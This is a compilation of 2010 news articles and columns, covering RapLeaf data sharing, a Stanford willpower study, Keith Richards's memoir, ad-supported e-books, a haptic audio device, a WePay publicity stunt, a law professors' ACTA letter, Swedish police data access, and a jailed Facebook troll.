Mrs. Twombly also removed applications from her Facebook profile that were transmitting data to RapLeaf, the Best Friends Gifts and Colorful Butterflies apps. The maker of those apps, Lolapps Media Inc., says it stopped working with RapLeaf.

Still, Mrs. Twombly is no longer using those apps to send virtual gifts and butterflies to her online friends. "My neighbor did send me a hug or a rainbow or a heart or something like that, but I didn't respond," Mrs. Twombly says. "Once burned, twice shy."
—Julia Angwin and Peter Wallsten contributed to this article.

Need a Study Break to Refresh? Maybe Not, Say Stanford Researchers

The Stanford researchers' study suggests that the need to take a break to clear your mind is all in your head.
Adam Gorlick

It could happen to students cramming for exams, people working long hours or just about anyone burning the candle at both ends: Something tells you to take a break. Watch some TV. Have a candy bar. Goof off, tune out for a bit and come back to the task at hand when you're feeling better. After all, you're physically exhausted.

But a new study from Stanford psychologists suggests the urge to refresh (or just procrastinate) is – well – all in your head.

In a paper published this week in Psychological Science, the researchers challenge a long-held theory that willpower – defined as the ability to resist temptation and stay focused on a demanding task – is a limited resource. Scientists have argued that when willpower is drained, the only way to restore it is by recharging our bodies with rest, food or some other physical distraction that takes you away from whatever is burning you out.

Not so, says the Stanford team. Instead, they've found that a person's mindset and personal beliefs about willpower determine how long and how well they'll be able to work on a tough mental exercise.

"If you think of willpower as something that's biologically limited, you're more likely to be tired when you perform a difficult task," said Veronika Job, the paper's lead author. "But if you think of willpower as something that is not easily depleted, you can go on and on."

Job, who conducted her research at Stanford and is now a postdoctoral scholar at the University of Zurich, co-authored the paper with Stanford psychology Professor Carol Dweck and Assistant Professor Greg Walton.

The researchers designed a series of four experiments to test and manipulate Stanford students' beliefs about willpower. After a tiring task, those who believed or were led to believe that willpower is a limited resource performed worse on standard concentration tests than those who thought of willpower as something they had more control over.

They also found that leading up to final exam week, students who bought into the limited resource theory ate junk food 24 percent more often than those who believed they had more control in resisting temptation. The limited resource believers also procrastinated 35 percent more than the other group.

"The theory that willpower is a limited resource is interesting, but it has had unintended consequences," Dweck said. "Students who may already have trouble studying are being told that their powers of concentration are limited and they need to take frequent breaks. But a belief in willpower as a non-limited resource makes people stronger in their ability to work through challenges."

The Stanford researchers say their findings could help people who are battling distraction or temptation: diabetics following strict diets, people trying to overcome addictions, employees facing a tight deadline.

"This is an example of a context where people's theories are driving outcomes," Walton said. "Willpower isn't driven by a biologically based process as much as we used to think. The belief in it is what influences your behavior."

A Writing Stone: Chapter And Verse The Life And Licks Of Keith Richards
Michiko Kakutani


By Keith Richards with James Fox

Illustrated. 564 pages. Little, Brown & Company. $29.99.

For legions of Rolling Stones fans, Keith Richards is not only the heart and soul of the world’s greatest rock ’n’ roll band, he’s also the very avatar of rebellion: the desperado, the buccaneer, the poète maudit, the soul survivor and main offender, the torn and frayed outlaw, and the coolest dude on the planet, named both No. 1 on the rock stars most-likely-to-die list and the one life form (besides the cockroach) capable of surviving nuclear war.

Halfway through his electrifying new memoir, “Life,” Keith Richards writes about the consequences of fame: the nearly complete loss of privacy and the weirdness of being mythologized by fans as a sort of folk-hero renegade.

“I can’t untie the threads of how much I played up to the part that was written for me,” he says. “I mean the skull ring and the broken tooth and the kohl. Is it half and half? I think in a way your persona, your image, as it used to be known, is like a ball and chain. People think I’m still a goddamn junkie. It’s 30 years since I gave up the dope! Image is like a long shadow. Even when the sun goes down, you can see it.”

By turns earnest and wicked, sweet and sarcastic and unsparing, Mr. Richards, now 66, writes with uncommon candor and immediacy. He’s decided that he’s going to tell it as he remembers it, and helped along with notebooks, letters and a diary he once kept, he remembers almost everything. He gives us an indelible, time-capsule feel for the madness that was life on the road with the Stones in the years before and after Altamont; harrowing accounts of his many close shaves and narrow escapes (from the police, prison time, drug hell); and a heap of sharp-edged snapshots of friends and colleagues — most notably, his longtime musical partner and sometime bête noire, Mick Jagger.

But “Life” — which was written with the veteran journalist James Fox — is way more than a revealing showbiz memoir. It is also a high-def, high-velocity portrait of the era when rock ’n’ roll came of age, a raw report from deep inside the counterculture maelstrom of how that music swept like a tsunami over Britain and the United States. It’s an eye-opening all-nighter in the studio with a master craftsman disclosing the alchemical secrets of his art. And it’s the intimate and moving story of one man’s long strange trip over the decades, told in dead-on, visceral prose without any of the pretense, caution or self-consciousness that usually attend great artists sitting for their self-portraits.

Die-hard Stones fans, of course, will pore over the detailed discussions of how songs like “Ruby Tuesday” and “Gimme Shelter” came to be written, the birthing process of some of Mr. Richards’s classic guitar riffs and the collaborative dynamic between him and Mr. Jagger. But the book will also dazzle the uninitiated, who thought they had only a casual interest in the Stones or who thought of Mr. Richards, vaguely, as a rock god who was mad, bad and dangerous to know. The book is that compelling and eloquently told.

Mr. Richards’s prose is like his guitar playing: intense, elemental, utterly distinctive and achingly, emotionally direct. Just as the Stones perfected a signature sound that could accommodate everything from ferocious Dionysian anthems to melancholy ballads about love and time and loss, so Mr. Richards has found a voice in these pages — a kind of rich, primal Keith-Speak — that enables him to dispense funny, streetwise observations, tender family reminiscences, casually profane yarns and wry literary allusions with both heart-felt sincerity and bad-boy charm.

Songwriting, Mr. Richards says, long ago turned him into an observer always on the lookout for “ammo,” and he does a highly tactile job here of conjuring the past, whether he’s describing his post-World War II childhood in the little town of Dartford (memorialized here with affectionate, Dickensian detail); the smoky blues clubs that he and his friends haunted in their early days in London; or the wretched excess of the Stones’ later tours, when they had “become a pirate nation,” booking entire floors in hotels and “moving on a huge scale under our own flag, with lawyers, clowns, attendants.”

In these pages we see Keith through the scrolling chapters of his life. There’s the choir boy and Boy Scout, who was bullied by schoolmates and kept a pet mouse named Gladys. The former art student, dedicating himself like a monk to mastering the blues:

“You were supposed to spend all your waking hours studying Jimmy Reed, Muddy Waters, Little Walter, Howlin’ Wolf, Robert Johnson. That was your gig. Every other moment taken away from it was a sin.”

And later, the rock star, known for his pirate swagger, who actually remains something of a shy romantic with women, worrying about finding “the right line, or one that hadn’t been used before.”

“I just never had that thing with women,” he writes. “I would do it silently. Very Charlie Chaplin. The scratch, the look, the body language. Get my drift? Now it’s up to you. ‘Hey, baby’ is just not my come-on.”

Mr. Richards communicates the boyish astonishment he felt when the Stones found their dream of being missionaries for the American music they loved suddenly giving way to pop fame of their own, and their hand-to-mouth existence in a London tenement (financed in part by redeeming empty beer bottles stolen from parties) metamorphosed into full-on stardom, complete with rioting teenagers and screaming girls. He conveys the exhausting rigors of life on the road, even as he captures the absurdities of what was rock star life back in the day: the pharmaceutical cocaine, the impulsive jaunts abroad (“let’s jump in the Bentley and go to Morocco”), the spectacle of the police perched in the trees outside his home.

Of the years of living dangerously, when he was zonked out on heroin, Mr. Richards recalls that he slept with a gun under his pillow; turned his 7-year-old son, Marlon, into his minder on the road; and forced all his band mates to live on “Keith Time,” in which 2 p.m. recording sessions had a way of becoming 1 a.m. dates the following day. He writes candidly about how everything began to revolve around “organizing the next fix” — elaborate stratagems, which at one point included buying doctor and nurse play sets at FAO Schwarz — and the difficulties of getting and staying clean.

Why did he become an addict in the first place? “I never particularly liked being that famous,” Mr. Richards says. “I could face people easier on the stuff, but I could do that with booze too. It isn’t really the whole answer. I also felt I was doing it not to be a ‘pop star.’ There was something I didn’t really like about that end of what I was doing, the blah blah blah. That was very difficult to handle, and I could handle it better on smack. Mick chose flattery, which is very like junk — a departure from reality. I chose junk.”

During the worst of his years on heroin, Mr. Richards writes, Mr. Jagger stepped up and dealt with the day-to-day business of running the band but was reluctant to relinquish his increased control once Mr. Richards returned to action. He writes that Mr. Jagger had begun to treat the rest of the band as “basically hirelings,” and he describes the sense of hurt and betrayal he felt when he read in an English newspaper that Mr. Jagger, then intent on a solo career, had described the Stones as a “millstone” around his neck.

Mr. Richards also mocks Mr. Jagger (whom he jokingly began referring to as “Brenda” or “Her Majesty”) as a social climber and swollen head, and says that Mr. Jagger “started second-guessing his own talent” and chasing after musical trends. But while this book’s passages about Mr. Jagger have made lots of headlines, especially in England, they are not all that different from the volleys of accusations the two have exchanged over the years, and Mr. Richards adds that deep down he and Mr. Jagger remain brothers.

It’s really less a case of “North and South Korea,” he says, than “East and West Berlin.”

Mr. Richards’s verbal photos of other colleagues and acquaintances are razor-sharp as well. He describes Hugh Hefner as “a nut” and “a pimp,” and Truman Capote as a “snooty” whiner. He writes that Chuck Berry was his “numero uno hero” (from whom Richards says he stole “every lick he ever played”) but “a big disappointment” when he met him in person. In another chapter he writes that success turned his former band mate Brian Jones “into this sort of freak, devouring celebs and fame and attention.”

In the course of “Life,” Mr. Richards discusses his clashes with the police and his much-chronicled court appearances, as well as all the other headlines generated by the tabloids over the years. But the most insistent melodic line in this volume has nothing to do with drugs or celebrity or scandal. It has to do with the spongelike love of music Mr. Richards inherited from his grandfather and his own sense of musical history, his reverence for the blues and R&B masters he has studied his entire life (“the tablets of stone”), and his determination to pass his own knowledge on down the line.

One of this galvanic book’s many achievements is that Mr. Richards has found a way to channel to the reader his own avidity, his own deep soul hunger for music and to make us feel the connections that bind one generation of musicians to another. Along the way he even manages to communicate something of that magic, electromagnetic experience of playing on stage with his mates, be it in a little club or a huge stadium.

“There’s a certain moment when you realize that you’ve actually just left the planet for a bit and that nobody can touch you,” Mr. Richards writes. “You’re elevated because you’re with a bunch of guys that want to do the same thing as you. And when it works, baby, you’ve got wings.” You are, he says, “flying without a license.”

Free E-Books, With a Catch – Advertising
John R. Quain

Barnes & Noble may kick off a fresh price war today for digital book readers. But the real news in digital publishing is a novel approach to the e-books themselves: Free books -- with advertising.

E-books and readers already look to be the holiday season's sleeper hit. Amazon announced that sales of its Kindle this month have already surpassed sales of the devices for the entire fourth quarter last year. And the company said that it will soon allow you to lend electronic versions of books for 14 days, a feature already offered on Barnes & Noble's Nook. (True friendship means always getting your loaned e-book back.)

Handheld electronic readers are clearly going mainstream. Wal-Mart just started selling Barnes & Noble's Nook this week, starting at $148. Best Buy sells both the Nook and the Kindle. Radio Shack offers Sony e-Readers, and Target recently started selling Apple's iPad.

So it's not surprising that more independent online e-book stores and publishers are looking to get in on the action. Stores other than Amazon and Barnes & Noble do exist, after all, such as BooksOnBoard and the Diesel e-book store -- no connection to the jeans. Most of these independent operators offer e-books in a variety of formats that can be downloaded and read on anything from a smartphone to an e-book reader.

But only one independent seller is offering free books with ads: Wowio.

The basic idea is to offer publishers another way to reach readers and to give readers the chance to try more books -- books that perhaps they wouldn't normally peruse if they had to pay more for them. Initially, Wowio specialized in offering digital versions of comic books and graphic novels, usually formatted as Adobe PDFs. So it was a natural step for the company to offer graphic ads that are inserted in e-books.

The ads themselves aren't intrusive: There are no annoying highlighted links in the text, nor are there irritating animations or takeovers to interrupt the reading experience. The advertisements are simply pages added to a book, typically up front: Notices for movie site Fandango and auction site iTaggit appeared in the copy of H.G. Wells' The War of the Worlds that I read. It's much like the advertising you'd see in a magazine, except that if you want more information or are enticed by a promotion, all you have to do is click to visit the advertiser's site.

"We think we're creating a broader audience for some of these titles," Wowio's CEO Brian Altounian told me. "I think folks are going to download more books because they're saving the costs" of having to drive to the store or pay more for them.

So far, Wowio just sells titles in PDF format, but this week it announced a major step forward by signing a deal with massive distributor Ingram, which will give the online store access to more than 50,000 popular books on November 1. Ingram has many bestsellers, such as The Girl with the Dragon Tattoo by Stieg Larsson and Legacy by Danielle Steel.

Ingram titles will be in the ePub format, which gives the publisher some control over how many devices the books can be copied to; it's also the format supported by Barnes & Noble's Nook and Sony's e-Reader. However, these e-books will not include advertising, with prices for individual titles yet to be determined.

"We're not trying to force publishers into any sort of pricing paradigm," said Altounian, referring to Amazon's and Apple's contract tussles with publishers. Meanwhile, Amazon is also planning to offer a free iPad app for its books. So Wowio is keeping readers' and publishers' options open.

On the other hand, Wowio is clearly betting that ad-supported e-books will be the future. The company was just granted what the patent office calls a "notice of allowance" for delivering advertisements in e-books. According to Altounian, the company expects to finally receive a very broad patent next month.

If he's right about how readers and publishers react to the format, the company could stand to make a lot of money from licensing the patent. And we could stand to save a lot of money on our future e-book purchases.

Just Sit Back and Immerse Yourself
Joe Sharkey

I GOT waylaid by an insistent inventor as I was hurrying through the crowd on my way to a panel discussion at the National Business Aviation Association convention here last week.

“You’ve got to try this; it’s amazing,” said Shahriar S. Afshar, the peppy chief executive of a company called Immerz, who had been hovering by a display table.

Hey, I’m usually up for amazing, so I let Mr. Afshar slide a small plastic contraption around my neck. It had two flat paddles that rested on my chest. He handed me some headphones and held out an iPod so I could watch a movie clip.

As if I needed reminding, the business aviation convention attracts people selling a lot more than just business jets. This year, there was a wide array of high-end products, like lightweight simulated granite for bathrooms and water purification systems so the highflying set can gargle better. This year, in-flight entertainment gear was hot, from big high-definition screens to inventions like Mr. Afshar’s, the KOR-fx total immersion audio-stimulation system.

That movie clip on his iPod, by the way, consisted of superheroes hollering, shooting guns, driving fast, blowing things up and punching each other. But the sound! The sound turned my chest cavity into a subwoofer. Suddenly, I was intensely drawn into this dumb movie scene.

“Whoa!” I said, removing the gear.

“Right? Right?” said Mr. Afshar, a physicist turned entrepreneur whose KOR-fx invention generated some interest earlier this year at the big annual International Consumer Electronics Show in Las Vegas.

Now, the last thing I need is another electronic marvel to put in a drawer and forget about. But Mr. Afshar’s wearable chest-woofer stopped me literally in my tracks, if only because it was so weirdly different from the usual audio and video gear. And with a price tag of $189.99 (it won’t be available until February, but the company is taking orders), the KOR-fx also struck me as one of the few affordable products on exhibit at the convention.

Of course, you had to consider the alternatives, as many of the approximately 25,000 industry people who attended were doing. Gulfstream, for example, showed off its eagerly anticipated G650 model, a long-range, high-speed business jet. It costs $64.5 million, and Gulfstream says it already has 200 firm orders. There was so much demand to see the new plane and its cabin that Gulfstream parked it in a location separate from the main display of about 100 other business aircraft at DeKalb-Peachtree Airport “simply to manage traffic flow,” said Jeff Miller, a Gulfstream spokesman.

And at the sprawling main aircraft display, Bombardier threw a lavish, crowded party on the tarmac to introduce its two new ultralong-range business jets, the Global 7000 and 8000 models — each priced at around $65 million.

Back at the convention center, Mr. Afshar and his company were working with Flight Display Systems, which makes in-flight entertainment equipment, to demonstrate the KOR-fx system for use by passengers on private jets and other planes. Eventually, Mr. Afshar said, Immerz planned to have a version available for commercial airlines.

Essentially, the KOR-fx is based on technology that generates not just acoustic but also tactile stimulation of the brain. The company also is working on plans to introduce more sophisticated versions of the system for movie theaters and game publishers.

“I personally have been using this, stealthily, on airplanes, flying all over,” Mr. Afshar said. “On a 15-hour flight to Asia, I basically immerse myself. And then all of a sudden, I have arrived, and I realize I just watched five movies.”

He told me, “You were watching just a plain old movie, with plain old movie sound coming through.” The system’s nearly imperceptible chest vibrations, he said, work with neural pathways to produce emotional immersion in a video or a game.

“The technological power is there, you can actually produce effects beyond what you experienced,” he added. “We can produce sensations of wind, sensations of G-forces, loss of balance. And since it activates the part of the brain that deals with emotion and sense of self, it can even produce emotions to match those of the characters in a game or movie. For example, it can stimulate you to cry.”

Hold on a minute there. I think the airlines are way ahead of you on stimulating the urge to cry. They already produce that sensation in customers, and they haven’t even put a price on it.


WePay Drops 600 Pounds Of Ice In Front Of PayPal Conference, Hilarity Ensues
Jason Kincaid

If you’re headed to PayPal’s big developer conference in San Francisco today, you may spot an unusual landmark sitting in front of the Moscone Center: a massive, 600 pound block of ice with hundreds of dollars locked beneath the surface. The frigid booty comes compliments of the WePay team, and they’re trolling PayPal’s conference in an effort to tell everyone in attendance that “PayPal freezes your accounts” and that you should “unfreeze your money”… by switching to WePay, of course.

It’s still early in the day, but the block of ice has already led to quite a bit of drama, including a moderate-speed chase involving a pallet mover. According to WePay cofounder Rich Aberman, the WePay squad wheeled the ice block over to the Moscone Center on a pallet mover and dropped off the cargo without issue. Aberman then quickly dashed away with the mover in tow, which he planned to hide nearby (Moscone security wouldn’t be able to remove the ice block without it).

Aberman made it 2.5 blocks before being chased down by a member of the Moscone security team, who proceeded to grab the pallet mover and wheel it back to the block of ice. After getting the ice back onto the mover, he wheeled it off Moscone property. Now Aberman tells me that the WePay team has resorted to wheeling the ice in a circle around the block.

WePay competes with PayPal on the group payments front. The service makes it easy to accept payments from multiple people, which makes it well-suited for everything from event ticketing to splitting your monthly bills with your roommate (without all the lame IOUs).

In some ways, PayPal has this coming — and not just because of its account freeze issues. Back in its earlier days when it was still sparring with eBay, a group of PayPal employees headed to southern California for a major eBay event. The PayPal team then proceeded to offer conference attendees a chance at winning hundreds of dollars — but only if they wore special PayPal-branded T-shirts to the conference the next day. Many of them did, and eBay got to watch its conference get taken over by a competitor. Of course, eBay then went on to acquire PayPal.

Over 75 Law Profs Call for Halt of ACTA

October 28, 2010

President Barack Obama
1600 Pennsylvania Avenue NW
Washington, DC 20500

Dear President Obama,

As academics dedicated to promoting robust public debate on the laws and public policies affecting the Internet, intellectual property, global innovation policy and the worldwide trade in knowledge goods and services, we write to express our grave concern that your Administration is negotiating a far-reaching international intellectual property agreement behind a shroud of secrecy, with little opportunity for public input, and with active participation by special interests who stand to gain from restrictive new international rules that may harm the public interest.

Your Administration promised to change the way Washington works. You promised to bring increased truthfulness and transparency to our public policy and law, including the Freedom of Information Act. You promised that wherever possible, important policy decisions would be made in public view, and not as the result of secret special interest deals hidden from the American people.

Your Administration’s negotiation of ACTA has been conducted in stark contrast to every one of these promises. In the interest of brevity, we’ll focus here on the three principal ways in which your Administration’s negotiation of ACTA undercuts the credibility of your previous promises.

First, ACTA’s negotiation has been conducted behind closed doors, subject to intense but needless secrecy, with the public shut out and a small group of special interests very much involved. The United States Trade Representative (USTR) has been involved in negotiations relating to ACTA for several years, and there have been drafts of portions of the agreement circulating among the negotiators since the start of negotiations. Despite that, the first official release of a draft text took place only in April, 2010. And following that release the USTR has not held a single public on-the-record meeting to invite comments on the text. Worse, in every subsequent meeting of the negotiating parties, the U.S. has blocked the public release of updated text. The U.S. often has acted alone in banning the distribution of the revised text, contrary to the strong majority view of other negotiating partners to promote public inspection and comment. Because the negotiations have operated on a consensus basis, the U.S. vote against transparency has been dispositive.

This degree of secrecy is unacceptable, unwise, and directly undercuts your oft-repeated promises of openness and transparency. Rather than seeking meaningful public input from the outset, your Administration has allowed the bulk of the public debate to be based upon, at best, hearsay and speculation. Yet, ACTA is a trade agreement setting out a range of new international rules governing intellectual property; as the G-8 called it, a “new international framework.” It is not (the claims of the USTR notwithstanding) related in any way to any standard definition of “national security” or any other interest of the United States similarly pressing or sensitive. The Administration’s determination to hide ACTA from the public creates the impression that ACTA is precisely the kind of backroom special interest deal – undertaken in this case on behalf of a narrow group of U.S. content producers, and without meaningful input from the American public – that you have so often publicly opposed.

Second, the Administration has stated that ACTA will be negotiated and implemented not as a treaty, but as a sole executive agreement. We believe that this course may be unlawful, and it is certainly unwise.

Now that a near-final version of the ACTA text has been released, it is clear that ACTA would usurp congressional authority over intellectual property policy in a number of ways. Some of ACTA’s provisions fail to explicitly incorporate current congressional policy, particularly in the areas of damages and injunctions.[1] Other sections lock in substantive law that may not be well-adapted to the present context, much less the future.[2] And in other areas, the agreement may complicate legislative efforts to solve widely recognized policy dilemmas, including in the area of orphan works, patent reform, secondary copyright liability and the creation of incentives for innovation in areas where the patent system may not be adequate.[3] The agreement is also likely to affect courts’ interpretation of U.S. law.[4]

The use of a sole executive agreement for ACTA appears unconstitutional.[5] The President may only make sole executive agreements that are within his independent constitutional authority.[6] The President has no independent constitutional authority over intellectual property or communications policy, the core subjects of ACTA. To the contrary, the Constitution gives primary authority over these matters to Congress, which is charged with making laws that regulate foreign commerce and intellectual property.[7] ACTA should not be pursued further without congressional oversight and a meaningful opportunity for public debate.

The USTR has insisted that ACTA’s provisions are merely procedural and only about enforcing existing rights. These assertions are simply false. Nearly 100 international intellectual property experts from six continents gathered in Washington, DC in June, 2010 to analyze the potential public interest impacts of the officially released text. Those experts – joined by over 650 other experts and organizations – found that “the terms of the publicly released draft of ACTA threaten numerous public interests, including every concern specifically disclaimed by negotiators.” The expert statement notes that:

• Negotiators claim ACTA will not interfere with citizens’ fundamental rights and liberties; it will.[8]

• They claim ACTA is consistent with the WTO Agreement on Trade Related Aspects of Intellectual Property Rights (TRIPS); it is not.[9]

• They claim ACTA will not increase border searches or interfere with cross-border transit of legitimate generic medicines; it will.[10]

• And they claim that ACTA does not require “graduated response” disconnections of people from the internet; however, the agreement encourages such policies.[11]

Academics and other neutral intellectual property experts have not had time to sufficiently analyze the current text and are unlikely to do so as long as there is no open public forum to submit such analysis in a meaningful process. Rather than create such a forum, the USTR has released text accompanied by the announcement that the negotiations are finished and the time for public comment, which was never granted in the first instance, is over. This is not meaningful, real-time transparency, and it is certainly not the kind of accountability that we were expecting from your Administration. We know enough to know that ACTA’s provisions are of significant interest to the general public, because they touch upon a wide range of public interests and are likely to alter the substantive law governing U.S. citizens. It is clear that before ACTA negotiations proceed further, Congress must be involved.

Third, and finally, we are concerned that the purpose that animates ACTA is being deliberately misrepresented to the American people. The treaty is named the “Anti-Counterfeiting Trade Agreement”. But it has little to do with counterfeiting or controlling the international trade in counterfeit goods. Rather, this agreement would enact much more encompassing changes in the international rules governing trade in a wide variety of knowledge goods – whether they are counterfeit or not – and would establish new intellectual property rules and norms without systematic inquiry into effects of such development on economic and technical innovation in the U.S. or abroad. These norms will affect virtually every American and should be the subject of wide public debate.

Our conclusion is simple: Any agreement of this scope and consequence must be based on a broad and meaningful consultative process, in public, on the record and with open on-going access to proposed negotiating text and must reflect a full range of public interest concerns. For the reasons detailed above, the ACTA negotiations fail to meet these standards.

While you cannot go back in time, you still have the opportunity to allow for meaningful public input, even at this late date. Accordingly, we call on you to direct the USTR to halt its public endorsement of ACTA and subject the text to a meaningful participation process that can influence the shape of the agreement going forward. Specifically, we call on you to direct USTR to:

1. Signal to other negotiators that the U.S. will not sign ACTA before the conclusion of a meaningful public participation process and another round of official negotiations where public participation is encouraged;

2. Hold a meaningful open, on-the-record public hearing on the draft text, the results of which will be used to determine what proposed changes to the agreement the administration will propose;

3. Renounce its position that the agreement is a “sole executive agreement” that can tie Congressional authority to amend intellectual property laws without congressional approval and instead pledge to seek congressional approval of the final text;

4. Consider reforms to the USTR’s industry trade advisory committee (ITAC) process that would allow for a wide range of official advisors;

5. Propose new language for the creation of the ACTA Committee that would require open, transparent and inclusive participation that takes into account the viewpoints of other stakeholders, including inter-governmental organizations (IGOs) and non-governmental organizations, in line with the principles of the World Intellectual Property Organization’s development agenda.[12]


Brook Baker
Northeastern University School of Law

Derek E. Bambauer
Brooklyn Law School

Mark Bartholomew
University at Buffalo Law School

Barton Beebe
New York University School of Law

Yochai Benkler
Harvard Law School

Heidi Bond
Seattle University

Denis Borges Barbosa
Catholic University, Rio de Janeiro

James Boyle
Duke University School of Law

Annemarie Bridy
University of Idaho School of Law

Dan L. Burk
University of California, Irvine

Diane Cabell
Berkman Center, Harvard University

Michael A. Carrier
Rutgers Law School-Camden

Michael Carroll
American University Washington College of Law

Colleen Chien
Santa Clara University School of Law

Andrew Chin
University of North Carolina School of Law

Margaret Chon
Seattle University School of Law

Susan Crawford
Cardozo Law School

Prof. Michael Davis
CSU College of Law

Alexander S. Dent
The George Washington University

Alex Feerst
Stanford Law School Center for Internet & Society

William Fisher
Harvard Law School

Sean Flynn
American University Washington College of Law

Dave Fagundes
Southwestern Law School

Jon M. Garon
Hamline University School of Law

Michael Geist
University of Ottawa School of Law

James Gibson
University of Richmond

Shubha Ghosh
University of Wisconsin School of Law

Debora J. Halbert
University of Hawai`i at Manoa

Robert A. Heverly
Albany Law School of Union University

Cynthia Ho
Loyola University of Chicago School of Law

Dan Hunter
New York University School of Law

Peter Jaszi
American University Washington College of Law

David R. Johnson
New York Law School

Amy Kapczynski
UC Berkeley School of Law

Alex Leavitt
Massachusetts Institute of Technology

Lawrence Lessig
Harvard Law School

David Levine
Elon University School of Law

Jake Linford
Florida State University College of Law

Michael J. Madison
University of Pittsburgh School of Law

Mark McKenna
Notre Dame Law School

Hiram Meléndez-Juarbe
University of Puerto Rico Law School

Gabriel J. Michael
The George Washington University

Viva R. Moffat
University of Denver College of Law

Michael R. Morris
University of Edinburgh

Tyler Ochoa
Santa Clara University School of Law

Kevin Outterson
Boston University

Dr Luigi Palombi
Australian National University

Frank Pasquale
Seton Hall School of Law

Malla Pollack
co-author, Callmann on Unfair Competition, Trademarks, and Monopolies (formerly Univ. of Idaho)

Kenneth L. Port
William Mitchell College of Law

David G. Post
Beasley School of Law, Temple University

Srividhya Ragavan
University of Oklahoma College of Law

R. Anthony Reese
UC Irvine School of Law

Jerome H. Reichman
Duke Law School

Betsy Rosenblatt
Whittier Law School

Patrick S. Ryan
University of Colorado at Boulder

Pam Samuelson
UC Berkeley School of Law

Jason M. Schultz
UC Berkeley School of Law

Susan K. Sell
The George Washington University

Wendy Seltzer
Princeton Center for Information Technology Policy

Jessica Silbey
Suffolk University Law School

Brenda Reddix-Smalls
North Carolina Central University School of Law

Christopher Sprigman
University of Virginia School of Law

Elizabeth Stark
Yale University

Katherine Strandburg
New York University School of Law

Talha Syed
UC Berkeley School of Law

Deborah Tussey
Oklahoma City University School of Law

Jennifer M. Urban
UC Berkeley School of Law

Jonathan Weinberg
Wayne State University

Darryl C. Wilson
Stetson University College of Law

Jane K. Winn
University of Washington School of Law

Peter K. Yu
Drake University Law School

Diane L. Zimmerman
New York University School of Law

Jonathan Zittrain
Harvard Law School


Max Baucus (Montana)

Chuck Grassley (Iowa)

Gary Locke

Hillary Clinton

Cameron F. Kerry

Geovette E. Washington

Quentin Palfrey

Andrew McLaughlin,

Phil J. Weiser

Alan Hoffman

Victoria Espinel

Lisa Garcia

Miriam Sapiro

Daniel Weitzner

Marc Berejka

David Kappos


Sweden to Extend Police Powers on Data Access

The Swedish government wants to extend the powers of police and prosecutors to access personal details from internet service providers in cases of less serious offences such as filesharing, libel and grooming.

Currently, ISPs may be required to hand over IP address and personal details of customers suspected of crimes subject to custodial sentences, but the government wants to extend the law to cover offences that are punishable only by fines.

The proposals are included in a justice department memorandum read by the TT news agency, in which is stated, "Procurement is proposed to be possible for all crimes, namely the requirement that imprisonment should be prescribed for the offence, and that according to the authority's judgement could result in penalties other than fines, should be removed."

Furthermore, it is proposed that the police be given access to information from mobile telephone operators detailing the location of missing persons if there is an established risk to their life or well-being.

The changes are proposed to be introduced in connection with the adoption of the EU Data Retention Directive. Sweden has previously been reluctant to implement the directive, which was approved by Brussels in March 2006.

The Swedish government was instructed by the European Court of Justice in February to adopt the measure and assured the court that the directive would be expected to pass into Swedish law on April 1st.

The directive was passed in the wake of the Madrid and London terrorist bombings. Seen as an important tool in combating terrorism, it raised concerns from privacy advocates. The Swedish justice minister Beatrice Ask has repeatedly expressed reservations over the scope of the powers that it confers.

The news of the government's proposals has been met with criticism from the Pirate Party.

"It is unfortunately evident that a large surveillance apparatus has been developed to be able to get at regular, honourable people who exchange films and music with each other," wrote Mikael Nilsson of the Pirate Party in a statement on Wednesday.

The Centre Party's Johan Linander, vice chair of the Riksdag Committee on Justice, has also been critical of the directive, which forces ISPs and mobile phone operators to save customer records for six months, but conceded that the proposed changes are positive.

"We can not have legislation which places different demands depending on the nature of the crime, this is broad legislation which gives the police access to this information," he said to Sverige Radio's P3 Nyheter news programme.

"To investigate sexual molestation, libel, insults and grooming, the types of internet crimes which have unfortunately become increasingly common," he added.

Jade Goody Website 'Troll' from Manchester Jailed

An "internet troll" who posted obscene messages on Facebook sites set up in memory of dead people has been jailed.

Colm Coss, of Ardwick, Manchester, posted on a memorial page for Big Brother star Jade Goody and a tribute site to John Paul Massey, a Liverpool boy mauled to death by a dog.

The 36-year-old "preyed on bereaved families" for his "own pleasure", Manchester Magistrates Court heard.

He was jailed for 18 weeks for sending "malicious communications".

The posts included comments claiming he had sex with the victims' dead bodies, the court heard.

Mental health

He was charged under the Communications Act 2003, for sending malicious communications that were grossly offensive.

Unemployed Coss was only caught when he sent residents on his street photos of himself saying he was an internet "troll".

One of the residents passed the photos to police who interviewed him before he eventually admitted to posting abusive messages.

The term "troll" was described in court as someone who creates new identities on Facebook accounts and then posts numerous offensive comments to upset or provoke a reaction from others.

Chairwoman of the bench Pauline Salisbury said: "You preyed on bereaved families who were suffering trauma and anxiety.

"We know you gained pleasure and you aren't sorry for what you did."

The defence raised possible mental health issues but they were dismissed by the bench.

When a Pirate Is the Voice of Chivalry
Maureen Dowd

It’s the Year of the Woman, all right. In a bad way. Some of the women running in high-profile races are not my cup of Tea. And some of the male candidates could be part of the Little Rascals’ He-Man, Woman-Haters Club.

The misogyny reached its zenith outside a Rand Paul debate in Lexington, Ky., on Monday night when a group of Tea Party toughs roughed up a woman from MoveOn.org because she wouldn’t move on.

One man, wearing a “Don’t Tread on Me” button, ripped off her wig and wrestled her to the ground with the help of another man, and a third Paul volunteer stamped his foot on her shoulder when she was down.

In a campaign season when many men — and women — are taking harsh stances that could hurt women, a chivalrous voice has at last arrived.

Oddly enough, it belongs to a renegade pirate whose motto is “Keep it dark”: Keith Richards.

You’d think that an only child whose mother killed all the pets he kept as companions would not grow up to be so positive about women.

“I put a note on her bedroom door, with a drawing of a cat, that said ‘Murderer,’ ” Richards writes in “Life,” his new memoir. “I never forgave her for that.”

His mom, Doris, who didn’t like the muss and fuss, reacted nonchalantly: “Shut up. Don’t be soft.”

But the first thing he did when he began making money with a little band called the Rolling Stones was buy Mum a house.

His reaction when the Stones started to attract hordes of “feral, body-snatching girls” was not titillation but terror. “I was never more in fear for my life than I was from teenage girls,” he writes. “The ones that choked me, tore me to shreds, if you got caught in a frenzied crowd of them — it’s hard to express how frightening they could be. You’d rather be in a trench fighting the enemy than to be faced with this unstoppable killer wave of lust and desire, or whatever it is — it’s unknown even to them.”

He continues: “The problem is if they get their hands on you, they don’t know what to do with you. They nearly strangled me with a necklace, one grabbed one side of it, the other grabbed the other, and they’re going, ‘Keith, Keith,’ and meanwhile they’re choking me.”

The shy English Boy Scout and choirboy who started out with “no chick in the world” describes the women he was involved with — from road flings to his manager to his ex, Anita Pallenberg — with candor but generosity.

